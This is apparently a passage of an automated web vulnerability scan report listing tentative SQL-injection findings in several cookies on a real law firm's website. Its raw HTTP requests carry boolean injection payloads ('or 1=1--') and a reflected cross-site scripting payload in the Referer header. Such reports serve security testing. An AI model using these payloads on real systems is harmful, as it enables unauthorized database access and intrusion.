Cookie: __utma=249287046.1504885052.1305202905.1305202905.1305216540.2; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A31%3A41; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmb=249287046.1.10.1305216540; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:11:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.27. http://www.pillsburylaw.com/a [CFID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 11939842%20or%201%3d1--%20 and 11939842%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953711939842%20or%201%3d1--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:35:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=;expires=Thu, 13-May-2010 00:35:53 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=1181953711939842%20or%201%3d2--%20; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11834516;path=/
Set-Cookie: CFTOKEN=68084189;path=/
Date: Fri, 13 May 2011 00:35:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.28. http://www.pillsburylaw.com/a [CFTOKEN cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The CFTOKEN cookie appears to be vulnerable to SQL injection attacks. The payloads 23034469%20or%201%3d1--%20 and 23034469%20or%201%3d2--%20 were each submitted in the CFTOKEN cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898823034469%20or%201%3d1--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFTOKEN=;expires=Thu, 13-May-2010 00:36:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=9177898823034469%20or%201%3d2--%20; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11834548;path=/
Set-Cookie: CFTOKEN=88941658;path=/
Date: Fri, 13 May 2011 00:36:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.29. http://www.pillsburylaw.com/a [MEDIAUSERID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The MEDIAUSERID cookie appears to be vulnerable to SQL injection attacks. The payloads 10682232'%20or%201%3d1--%20 and 10682232'%20or%201%3d2--%20 were each submitted in the MEDIAUSERID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=10682232'%20or%201%3d1--%20; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERID=;expires=Thu, 13-May-2010 00:36:36 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=10682232'%20or%201%3d2--%20; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.30. http://www.pillsburylaw.com/a [MEDIAUSERNAME cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 14521441'%20or%201%3d1--%20 and 14521441'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=14521441'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Thu, 13-May-2010 00:36:46 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=14521441'%20or%201%3d2--%20; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Fri, 13 May 2011 00:36:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10p
...[SNIP]...

1.31. http://www.pillsburylaw.com/a [PCONNECTID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /a

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 67778256'%20or%201%3d1--%20 and 67778256'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /a HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/connect_forgotpassword.cfm?p=99e46e6%22%3E%3Cimg%20src%3da%20onerror%3dalert(%22GHDB%22)%3E1c24eada36d
Cookie: __utma=249287046.1504885052.1305202905.1305218658.1305229758.4; __utmz=249287046.1305229758.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; hubspotdt=2011-05-12%2015%3A49%3A25; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=67778256'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 13 May 2011 00:36:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Thu, 13-May-2010 00:36:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8
